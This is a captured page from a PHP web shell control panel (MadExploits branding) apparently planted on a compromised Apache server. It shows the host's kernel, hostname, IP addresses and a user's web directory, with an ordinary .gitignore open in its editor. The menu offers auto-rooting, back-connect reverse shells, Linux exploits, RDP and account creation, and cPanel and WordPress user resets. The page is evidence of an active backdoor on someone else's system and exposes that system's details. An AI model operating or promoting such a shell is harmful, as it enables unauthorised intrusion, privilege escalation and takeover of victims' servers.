Linux aries.aptans.com 4.18.0-348.20.1.lve.1.el8.x86_64 #1 SMP Wed Mar 16 08:45:39 EDT 2022 x86_64
Apache
: 135.181.142.107 | : 172.69.7.46
Cant Read [ /etc/named.conf ]
7.4.33
aja
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
aja /
public_html /
ead /
local /
contact /
[ HOME SHELL ]
Name
Size
Permission
Action
classes
[ DIR ]
drwxr-xr-x
lang
[ DIR ]
drwxr-xr-x
pix
[ DIR ]
drwxr-xr-x
.gitignore
2.92
KB
-rw-r--r--
CHANGELOG.md
6
KB
-rw-r--r--
CONTRIBUTING.md
2.08
KB
-rw-r--r--
LICENSE.txt
31.71
KB
-rw-r--r--
README.md
38.8
KB
-rw-r--r--
composer.json
1.07
KB
-rw-r--r--
composer.lock
4.78
KB
-rw-r--r--
index.php
6.21
KB
-rw-r--r--
settings.php
4.05
KB
-rw-r--r--
version.php
1.37
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : .gitignore
##### Only include English /lang/* !/lang/en ##### Windows # Windows thumbnail cache files Thumbs.db Thumbs.db:encryptable ehthumbs.db ehthumbs_vista.db # Windows shortcuts *.lnk # Test file. test.php # KDE directory preferences .directory ##### MacOS # General .DS_Store .AppleDouble .LSOverride # Thumbnails ._* ##### Backup *.bak *.bakup *.gho *.old *.ori *.orig *.original *.tmp *.temp # Log file - the following switch allows to specify the file that will be # used to write all messages from simulation: -l <filename> *.log ##### Dropbox # Dropbox settings and caches .dropbox .dropbox.attr .dropbox.cache ##### Vim # Swap [._]*.s[a-v][a-z] !*.svg # comment out if you don't need vector files [._]*.sw[a-p] [._]s[a-rt-v][a-z] [._]ss[a-gi-z] [._]sw[a-p] # Session Session.vim Sessionx.vim ##### Emacs # -*- mode: gitignore; -*- *~ \#*\# /.emacs.desktop /.emacs.desktop.lock *.elc auto-save-list tramp .\#* ##### SublimeText # Cache files for Sublime Text *.tmlanguage.cache *.tmPreferences.cache *.stTheme.cache # Workspace files are user-specific *.sublime-workspace # Project files should be checked into the repository, unless a significant # proportion of contributors will probably not be using Sublime Text # *.sublime-project ##### TextMate *.tmproj *.tmproject tmtags ##### VisualStudioCode .vscode/ .vscode/* !.vscode/settings.json !.vscode/tasks.json !.vscode/launch.json !.vscode/extensions.json *.code-workspace # Local History for Visual Studio Code .history/ ##### NetBeans **/nbproject/private/ **/nbproject/Makefile-*.mk **/nbproject/Package-*.bash build/ nbbuild/ dist/ nbdist/ .nb-gradle/ ##### JetBrains # Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio, WebStorm and Rider # Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839 # User-specific stuff .idea/**/workspace.xml .idea/**/tasks.xml .idea/**/usage.statistics.xml .idea/**/dictionaries .idea/**/shelf # Generated files .idea/**/contentModel.xml # Sensitive or high-churn files .idea/**/dataSources/ .idea/**/dataSources.ids .idea/**/dataSources.local.xml .idea/**/sqlDataSources.xml .idea/**/dynamic.xml .idea/**/uiDesigner.xml .idea/**/dbnavigator.xml ##### Eclipse .metadata bin/ tmp/ *~.nib local.properties .settings/ .loadpath .recommenders ##### Dreamweaver # DW Dreamweaver added files _notes _compareTemp configs/ dwsync.xml dw_php_codehinting.config *.mno ##### CodeKit # General CodeKit files to ignore config.codekit config.codekit3 /min ##### Composer composer.phar /vendor/ # Commit your application's lock file https://getcomposer.org/doc/01-basic-usage.md#commit-your-composer-lock-file-to-version-control # You may choose to ignore a library lock file http://getcomposer.org/doc/02-libraries.md#lock-file composer.lock ##### PHP CodeSniffer # gitignore for the PHP Codesniffer framework # website: https://github.com/squizlabs/PHP_CodeSniffer # # Recommended template: PHP.gitignore /wpcs/*
Close